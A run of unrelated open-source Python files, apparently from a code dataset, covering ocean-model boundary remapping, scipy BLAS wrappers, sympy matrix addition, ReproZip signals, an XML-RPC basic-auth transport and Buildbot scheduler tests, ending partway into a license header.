# lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '*')
lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '_0*')
# lst = commands.getoutput('ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '_0[4-9]*')
lst = lst.split()
lst_file = lst_file + lst
print 'Build OBC file from the following file list:'
print lst_file
print ' '
src_grd_file = data_dir + '../HYCOM_GLBa0.08_North_grid2.nc'
src_grd = pyroms_toolbox.Grid_HYCOM.get_nc_Grid_HYCOM(src_grd_file)
dst_grd = pyroms.grid.get_ROMS_grid('ARCTIC2')
def do_file(file):
zeta = remap_bdry(file, 'ssh', src_grd, dst_grd, dst_dir=dst_dir)
dst_grd2 = pyroms.grid.get_ROMS_grid('ARCTIC2', zeta=zeta)
remap_bdry(file, 'temp', src_grd, dst_grd2, dst_dir=dst_dir)
remap_bdry(file, 'salt', src_grd, dst_grd2, dst_dir=dst_dir)
# pdb.set_trace()
remap_bdry_uv(file, src_grd, dst_grd2, dst_dir=dst_dir)
# merge file
bdry_file = dst_dir + file.rsplit('/')[-1][:-3] + '_bdry_' + dst_grd.name + '.nc'
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_ssh_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-O', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_temp_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_salt_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_u_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_v_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.check_call(command)
os.remove(out_file)
processes = 4
p = Pool(processes)
results = p.map(do_file, lst_file)
|
sikmir/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/grass7/ext/r_li_mps.py
|
45
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
r_li_mps.py
-----------
Date : February 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'February 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
from .r_li import checkMovingWindow, configFile
def checkParameterValuesBeforeExecuting(alg, parameters, context):
return checkMovingWindow(alg, parameters, context)
def processCommand(alg, parameters, context, feedback):
configFile(alg, parameters, context, feedback)
|
andim/scipy
|
refs/heads/master
|
scipy/linalg/blas.py
|
4
|
"""
Low-level BLAS functions (:mod:`scipy.linalg.blas`)
===================================================
This module contains low-level functions from the BLAS library.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
:toctree: generated/
get_blas_funcs
find_best_blas_type
BLAS Level 1 functions
----------------------
.. autosummary::
:toctree: generated/
caxpy
ccopy
cdotc
cdotu
crotg
cscal
csrot
csscal
cswap
dasum
daxpy
dcopy
ddot
dnrm2
drot
drotg
drotm
drotmg
dscal
dswap
dzasum
dznrm2
icamax
idamax
isamax
izamax
sasum
saxpy
scasum
scnrm2
scopy
sdot
snrm2
srot
srotg
srotm
srotmg
sscal
sswap
zaxpy
zcopy
zdotc
zdotu
zdrot
zdscal
zrotg
zscal
zswap
BLAS Level 2 functions
----------------------
.. autosummary::
:toctree: generated/
cgemv
cgerc
cgeru
chemv
ctrmv
csyr
cher
cher2
dgemv
dger
dsymv
dtrmv
dsyr
dsyr2
sgemv
sger
ssymv
strmv
ssyr
ssyr2
zgemv
zgerc
zgeru
zhemv
ztrmv
zsyr
zher
zher2
BLAS Level 3 functions
----------------------
.. autosummary::
:toctree: generated/
cgemm
chemm
cherk
cher2k
csymm
csyrk
csyr2k
dgemm
dsymm
dsyrk
dsyr2k
sgemm
ssymm
ssyrk
ssyr2k
zgemm
zhemm
zherk
zher2k
zsymm
zsyrk
zsyr2k
"""
#
# Author: Pearu Peterson, March 2002
# refactoring by Fabian Pedregosa, March 2010
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_blas_funcs', 'find_best_blas_type']
import numpy as _np
from scipy.linalg import _fblas
try:
from scipy.linalg import _cblas
except ImportError:
_cblas = None
# Expose all functions (only fblas --- cblas is an implementation detail)
empty_module = None
from scipy.linalg._fblas import *
del empty_module
# 'd' will be the default for 'i' and other dtype characters not listed.
_type_conv = {'f': 's', 'd': 'd', 'F': 'c', 'D': 'z', 'G': 'z'}
# some convenience alias for complex functions
_blas_alias = {'cnrm2': 'scnrm2', 'znrm2': 'dznrm2',
'cdot': 'cdotc', 'zdot': 'zdotc',
'cger': 'cgerc', 'zger': 'zgerc',
'sdotc': 'sdot', 'sdotu': 'sdot',
'ddotc': 'ddot', 'ddotu': 'ddot'}
def find_best_blas_type(arrays=(), dtype=None):
"""Find best-matching BLAS/LAPACK type.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
prefix : str
BLAS/LAPACK prefix character.
dtype : dtype
Inferred Numpy data type.
prefer_fortran : bool
Whether to prefer Fortran order routines over C order.
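    Examples
    --------
    A small sketch (the array contents are arbitrary):
    >>> import numpy as np
    >>> from scipy.linalg.blas import find_best_blas_type
    >>> a = np.zeros((3, 3), dtype=np.float64)
    >>> find_best_blas_type((a,))  # C-ordered double precision input
    ('d', dtype('float64'), False)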
"""
dtype = _np.dtype(dtype)
prefer_fortran = False
if arrays:
# use the most generic type in arrays
dtypes = [ar.dtype for ar in arrays]
dtype = _np.find_common_type(dtypes, ())
try:
index = dtypes.index(dtype)
except ValueError:
index = 0
if arrays[index].flags['FORTRAN']:
# prefer Fortran for leading array with column major order
prefer_fortran = True
prefix = _type_conv.get(dtype.char, 'd')
return prefix, dtype, prefer_fortran
def _get_funcs(names, arrays, dtype,
lib_name, fmodule, cmodule,
fmodule_name, cmodule_name, alias):
"""
Return available BLAS/LAPACK functions.
Used also in lapack.py. See get_blas_funcs for docstring.
"""
funcs = []
unpack = False
dtype = _np.dtype(dtype)
module1 = (cmodule, cmodule_name)
module2 = (fmodule, fmodule_name)
if isinstance(names, str):
names = (names,)
unpack = True
prefix, dtype, prefer_fortran = find_best_blas_type(arrays, dtype)
if prefer_fortran:
module1, module2 = module2, module1
for i, name in enumerate(names):
func_name = prefix + name
func_name = alias.get(func_name, func_name)
func = getattr(module1[0], func_name, None)
module_name = module1[1]
if func is None:
func = getattr(module2[0], func_name, None)
module_name = module2[1]
if func is None:
raise ValueError(
'%s function %s could not be found' % (lib_name, func_name))
func.module_name, func.typecode = module_name, prefix
func.dtype = dtype
func.prefix = prefix # Backward compatibility
funcs.append(func)
if unpack:
return funcs[0]
else:
return funcs
def get_blas_funcs(names, arrays=(), dtype=None):
"""Return available BLAS function objects from names.
Arrays are used to determine the optimal prefix of BLAS routines.
Parameters
----------
names : str or sequence of str
Name(s) of BLAS functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of BLAS
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In BLAS, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
types {float32, float64, complex64, complex128} respectively.
The code and the dtype are stored in attributes `typecode` and `dtype`
of the returned functions.
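    Examples
    --------
    A minimal sketch (the array values are arbitrary):
    >>> import numpy as np
    >>> from scipy.linalg.blas import get_blas_funcs
    >>> x = np.array([1.0, 2.0, 3.0])
    >>> nrm2 = get_blas_funcs('nrm2', (x,))  # resolves to dnrm2 for float64
    >>> nrm2.typecode
    'd'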
"""
return _get_funcs(names, arrays, dtype,
"BLAS", _fblas, _cblas, "fblas", "cblas",
_blas_alias)
|
harikvpy/crud
|
refs/heads/master
|
crud/wsgi.py
|
1
|
"""
WSGI config for crud project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crud.settings")
application = get_wsgi_application()
|
ViDA-NYU/reprozip
|
refs/heads/1.0.x
|
reprounzip/reprounzip/signals.py
|
1
|
# Copyright (C) 2014-2017 New York University
# This file is part of ReproZip which is released under the Revised BSD License
# See file LICENSE for full license details.
"""Signal system.
Emitting and subscribing to these signals is the framework for the plugin
infrastructure.
"""
from __future__ import division, print_function, unicode_literals
import traceback
import warnings
from reprounzip.utils import irange, iteritems
class SignalWarning(UserWarning):
"""Warning from the Signal class.
Mainly useful for testing (to turn these to errors), however a 'signal:'
prefix is actually used in the messages because of Python bug 22543
http://bugs.python.org/issue22543
"""
class Signal(object):
"""A signal, with its set of arguments.
This holds the expected parameters that the signal expects, in several
categories:
    * `expected_args` are the arguments of the signal that must be set. Trying
    to emit the signal without these will show a warning and won't touch the
    listeners. Listeners can rely on these being set.
    * `new_args` are new arguments that listeners cannot yet rely on but that
    emitters should try to pass in. Missing arguments don't show a warning
    yet but might in the future.
* `old_args` are arguments that you might still pass in but that you should
move away from; they will show a warning stating their deprecation.
Listeners can subscribe to a signal, and may be any callable hashable
object.
"""
REQUIRED, OPTIONAL, DEPRECATED = irange(3)
def __init__(self, expected_args=[], new_args=[], old_args=[]):
self._args = {}
self._args.update((arg, Signal.REQUIRED) for arg in expected_args)
self._args.update((arg, Signal.OPTIONAL) for arg in new_args)
self._args.update((arg, Signal.DEPRECATED) for arg in old_args)
if (len(expected_args) + len(new_args) + len(old_args) !=
len(self._args)):
raise ValueError("Repeated argument names")
self._listeners = set()
def __call__(self, **kwargs):
info = {}
for arg, argtype in iteritems(self._args):
if argtype == Signal.REQUIRED:
try:
info[arg] = kwargs.pop(arg)
except KeyError:
warnings.warn("signal: Missing required argument %s; "
"signal ignored" % arg,
category=SignalWarning,
stacklevel=2)
return
else:
if arg in kwargs:
info[arg] = kwargs.pop(arg)
if argtype == Signal.DEPRECATED:
warnings.warn(
"signal: Argument %s is deprecated" % arg,
category=SignalWarning,
stacklevel=2)
if kwargs:
arg = next(iter(kwargs))
warnings.warn(
"signal: Unexpected argument %s; signal ignored" % arg,
category=SignalWarning,
stacklevel=2)
return
for listener in self._listeners:
try:
listener(**info)
except Exception:
traceback.print_exc()
warnings.warn("signal: Got an exception calling a signal",
category=SignalWarning)
def subscribe(self, func):
"""Adds the given callable to the listeners.
It must be callable and hashable (it will be put in a set).
It will be called with the signals' arguments as keywords. Because new
parameters might be introduced, it should accept these by using::
def my_listener(param1, param2, **kwargs_):
"""
if not callable(func):
raise TypeError("%r object is not callable" % type(func))
self._listeners.add(func)
def unsubscribe(self, func):
"""Removes the given callable from the listeners.
If the listener wasn't subscribed, does nothing.
"""
self._listeners.discard(func)
pre_setup = Signal(['target', 'pack'])
post_setup = Signal(['target'], ['pack'])
pre_destroy = Signal(['target'])
post_destroy = Signal(['target'])
pre_run = Signal(['target'])
post_run = Signal(['target', 'retcode'])
pre_parse_args = Signal(['parser', 'subparsers'])
post_parse_args = Signal(['args'])
application_finishing = Signal(['reason'])
unpacker = None
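# Illustrative sketch (added for exposition, not part of the original module):
# a plugin subscribes to one of the signals defined above. 'target' is a
# required argument of post_setup, so the listener can rely on it; extra
# keywords are absorbed through **kwargs_ to stay forward-compatible. The
# listener name and paths are placeholders.
#
#     def my_post_setup_listener(target, **kwargs_):
#         print("experiment unpacked into %s" % target)
#
#     post_setup.subscribe(my_post_setup_listener)
#     post_setup(target='/tmp/experiment', pack='/tmp/experiment.rpz')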
|
Qusic/ycmd
|
refs/heads/master
|
cpp/ycm/tests/gmock/gtest/scripts/upload_gtest.py
|
1963
|
#!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""upload_gtest.py v0.1.0 -- uploads a Google Test patch for review.
This simple wrapper passes all command line flags and
--cc=googletestframework@googlegroups.com to upload.py.
USAGE: upload_gtest.py [options for upload.py]
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
CC_FLAG = '--cc='
GTEST_GROUP = 'googletestframework@googlegroups.com'
def main():
# Finds the path to upload.py, assuming it is in the same directory
# as this file.
my_dir = os.path.dirname(os.path.abspath(__file__))
upload_py_path = os.path.join(my_dir, 'upload.py')
# Adds Google Test discussion group to the cc line if it's not there
# already.
upload_py_argv = [upload_py_path]
found_cc_flag = False
for arg in sys.argv[1:]:
if arg.startswith(CC_FLAG):
found_cc_flag = True
cc_line = arg[len(CC_FLAG):]
cc_list = [addr for addr in cc_line.split(',') if addr]
if GTEST_GROUP not in cc_list:
cc_list.append(GTEST_GROUP)
upload_py_argv.append(CC_FLAG + ','.join(cc_list))
else:
upload_py_argv.append(arg)
if not found_cc_flag:
upload_py_argv.append(CC_FLAG + GTEST_GROUP)
# Invokes upload.py with the modified command line flags.
os.execv(upload_py_path, upload_py_argv)
if __name__ == '__main__':
main()
|
robin-banks/android_kernel_htc_msm8974
|
refs/heads/cm-12.1
|
tools/perf/python/twatch.py
|
7370
|
#! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, watermark = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
|
awagnon/maraschino
|
refs/heads/new
|
lib/rtorrent/lib/xmlrpc/basic_auth.py
|
95
|
#
# Copyright (c) 2013 Dean Gardiner, <gardiner91@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from base64 import encodestring
import string
import xmlrpclib
class BasicAuthTransport(xmlrpclib.Transport):
def __init__(self, username=None, password=None):
xmlrpclib.Transport.__init__(self)
self.username = username
self.password = password
def send_auth(self, h):
if self.username is not None and self.password is not None:
h.putheader('AUTHORIZATION', "Basic %s" % string.replace(
encodestring("%s:%s" % (self.username, self.password)),
"\012", ""
))
def single_request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
h = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
try:
self.send_request(h, handler, request_body)
self.send_host(h, host)
self.send_user_agent(h)
self.send_auth(h)
self.send_content(h, request_body)
response = h.getresponse(buffering=True)
if response.status == 200:
self.verbose = verbose
return self.parse_response(response)
except xmlrpclib.Fault:
raise
except Exception:
self.close()
raise
#discard any response data and raise exception
if response.getheader("content-length", 0):
response.read()
raise xmlrpclib.ProtocolError(
host + handler,
response.status, response.reason,
response.msg,
)
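# Illustrative usage sketch (added for exposition, not part of the original
# module): the transport is handed to xmlrpclib.ServerProxy so every request
# carries the Basic Auth header built in send_auth(). Host and credentials
# below are placeholders.
#
#     server = xmlrpclib.ServerProxy(
#         "http://localhost:80/RPC2",
#         transport=BasicAuthTransport("user", "secret"))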
|
NikNitro/Python-iBeacon-Scan
|
refs/heads/master
|
sympy/matrices/expressions/matadd.py
|
8
|
from __future__ import print_function, division
from sympy.core.compatibility import reduce
from operator import add
from sympy.core import Add, Basic, sympify
from sympy.functions import adjoint
from sympy.matrices.matrices import MatrixBase
from sympy.matrices.expressions.transpose import transpose
from sympy.strategies import (rm_id, unpack, flatten, sort, condition,
exhaust, do_one, glom)
from sympy.matrices.expressions.matexpr import MatrixExpr, ShapeError, ZeroMatrix
from sympy.utilities import default_sort_key, sift
class MatAdd(MatrixExpr):
"""A Sum of Matrix Expressions
MatAdd inherits from and operates like SymPy Add
>>> from sympy import MatAdd, MatrixSymbol
>>> A = MatrixSymbol('A', 5, 5)
>>> B = MatrixSymbol('B', 5, 5)
>>> C = MatrixSymbol('C', 5, 5)
>>> MatAdd(A, B, C)
A + B + C
"""
is_MatAdd = True
def __new__(cls, *args, **kwargs):
args = list(map(sympify, args))
check = kwargs.get('check', True)
obj = Basic.__new__(cls, *args)
if check:
validate(*args)
return obj
@property
def shape(self):
return self.args[0].shape
def _entry(self, i, j):
return Add(*[arg._entry(i, j) for arg in self.args])
def _eval_transpose(self):
return MatAdd(*[transpose(arg) for arg in self.args]).doit()
def _eval_adjoint(self):
return MatAdd(*[adjoint(arg) for arg in self.args]).doit()
def _eval_trace(self):
from .trace import trace
return Add(*[trace(arg) for arg in self.args]).doit()
def doit(self, **kwargs):
deep = kwargs.get('deep', True)
if deep:
args = [arg.doit(**kwargs) for arg in self.args]
else:
args = self.args
return canonicalize(MatAdd(*args))
def validate(*args):
if not all(arg.is_Matrix for arg in args):
raise TypeError("Mix of Matrix and Scalar symbols")
A = args[0]
for B in args[1:]:
if A.shape != B.shape:
raise ShapeError("Matrices %s and %s are not aligned"%(A, B))
factor_of = lambda arg: arg.as_coeff_mmul()[0]
matrix_of = lambda arg: unpack(arg.as_coeff_mmul()[1])
def combine(cnt, mat):
if cnt == 1:
return mat
else:
return cnt * mat
def merge_explicit(matadd):
""" Merge explicit MatrixBase arguments
>>> from sympy import MatrixSymbol, eye, Matrix, MatAdd, pprint
>>> from sympy.matrices.expressions.matadd import merge_explicit
>>> A = MatrixSymbol('A', 2, 2)
>>> B = eye(2)
>>> C = Matrix([[1, 2], [3, 4]])
>>> X = MatAdd(A, B, C)
>>> pprint(X)
[1 0] [1 2]
A + [ ] + [ ]
[0 1] [3 4]
>>> pprint(merge_explicit(X))
[2 2]
A + [ ]
[3 5]
"""
groups = sift(matadd.args, lambda arg: isinstance(arg, MatrixBase))
if len(groups[True]) > 1:
return MatAdd(*(groups[False] + [reduce(add, groups[True])]))
else:
return matadd
rules = (rm_id(lambda x: x == 0 or isinstance(x, ZeroMatrix)),
unpack,
flatten,
glom(matrix_of, factor_of, combine),
merge_explicit,
sort(default_sort_key))
canonicalize = exhaust(condition(lambda x: isinstance(x, MatAdd),
do_one(*rules)))
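# Illustrative sketch (added for exposition, not part of the original module):
# doit() pushes a MatAdd through the rules above, e.g. ZeroMatrix terms are
# stripped by rm_id and repeated symbols are glommed into a scalar multiple,
# so the following should give 2*A.
#
#     >>> from sympy import MatrixSymbol, ZeroMatrix
#     >>> A = MatrixSymbol('A', 2, 2)
#     >>> MatAdd(A, ZeroMatrix(2, 2), A).doit()
#     2*A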
|
protatremy/buildbot
|
refs/heads/master
|
master/buildbot/test/unit/test_schedulers_timed_Periodic.py
|
4
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from twisted.internet import defer
from twisted.internet import task
from twisted.trial import unittest
from buildbot import config
from buildbot.schedulers import timed
from buildbot.test.util import scheduler
class Periodic(scheduler.SchedulerMixin, unittest.TestCase):
OBJECTID = 23
SCHEDULERID = 3
def setUp(self):
self.setUpScheduler()
def makeScheduler(self, firstBuildDuration=0, exp_branch=None, **kwargs):
self.sched = sched = timed.Periodic(**kwargs)
self.attachScheduler(self.sched, self.OBJECTID, self.SCHEDULERID)
        # add a Clock to help check timing issues
self.clock = sched._reactor = task.Clock()
# keep track of builds in self.events
self.events = []
def addBuildsetForSourceStampsWithDefaults(reason, sourcestamps,
waited_for=False, properties=None, builderNames=None,
**kw):
self.assertIn('Periodic scheduler named', reason)
# TODO: check branch
isFirst = (self.events == [])
self.events.append('B@%d' % self.clock.seconds())
if isFirst and firstBuildDuration:
d = defer.Deferred()
self.clock.callLater(firstBuildDuration, d.callback, None)
return d
return defer.succeed(None)
sched.addBuildsetForSourceStampsWithDefaults = addBuildsetForSourceStampsWithDefaults
# handle state locally
self.state = {}
def getState(k, default):
return defer.succeed(self.state.get(k, default))
sched.getState = getState
def setState(k, v):
self.state[k] = v
return defer.succeed(None)
sched.setState = setState
return sched
# tests
def test_constructor_invalid(self):
self.assertRaises(config.ConfigErrors,
lambda: timed.Periodic(name='test', builderNames=['test'],
periodicBuildTimer=-2))
def test_constructor_no_reason(self):
sched = self.makeScheduler(
name='test', builderNames=['test'], periodicBuildTimer=10)
self.assertEqual(
sched.reason, "The Periodic scheduler named 'test' triggered this build")
def test_constructor_reason(self):
sched = self.makeScheduler(
name='test', builderNames=['test'], periodicBuildTimer=10, reason="periodic")
self.assertEqual(sched.reason, "periodic")
def test_iterations_simple(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@13', 'B@26'])
self.assertEqual(self.state.get('last_build'), 26)
d = sched.deactivate()
return d
def test_iterations_simple_branch(self):
sched = self.makeScheduler(exp_branch='newfeature',
name='test', builderNames=['test'],
periodicBuildTimer=13, branch='newfeature')
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@13', 'B@26'])
self.assertEqual(self.state.get('last_build'), 26)
d = sched.deactivate()
return d
def test_iterations_long(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=10,
firstBuildDuration=15) # takes a while to start a build
sched.activate()
self.clock.advance(0) # let it trigger the first (longer) build
while self.clock.seconds() < 40:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@15', 'B@25', 'B@35'])
self.assertEqual(self.state.get('last_build'), 35)
d = sched.deactivate()
return d
def test_iterations_stop_while_starting_build(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13,
firstBuildDuration=6) # takes a while to start a build
sched.activate()
self.clock.advance(0) # let it trigger the first (longer) build
self.clock.advance(3) # get partway into that build
d = sched.deactivate() # begin stopping the service
d.addCallback(
lambda _: self.events.append('STOP@%d' % self.clock.seconds()))
# run the clock out
while self.clock.seconds() < 40:
self.clock.advance(1)
# note that the deactivate completes after the first build completes, and no
# subsequent builds occur
self.assertEqual(self.events, ['B@0', 'STOP@6'])
self.assertEqual(self.state.get('last_build'), 0)
return d
def test_iterations_with_initial_state(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# so next build should start in 6s
self.state['last_build'] = self.clock.seconds() - 7
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@6', 'B@19'])
self.assertEqual(self.state.get('last_build'), 19)
d = sched.deactivate()
return d
def test_getNextBuildTime_None(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# given None, build right away
d = sched.getNextBuildTime(None)
d.addCallback(lambda t: self.assertEqual(t, 0))
return d
def test_getNextBuildTime_given(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# given a time, add the periodicBuildTimer to it
d = sched.getNextBuildTime(20)
d.addCallback(lambda t: self.assertEqual(t, 33))
return d
@defer.inlineCallbacks
def test_enabled_callback(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
expectedValue = not sched.enabled
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, expectedValue)
expectedValue = not sched.enabled
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, expectedValue)
@defer.inlineCallbacks
def test_disabled_activate(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.activate()
self.assertEqual(r, None)
@defer.inlineCallbacks
def test_disabled_deactivate(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.deactivate()
self.assertEqual(r, None)
@defer.inlineCallbacks
def test_disabled_start_build(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.startBuild()
self.assertEqual(r, None)
|
dparshin/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py
|
118
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
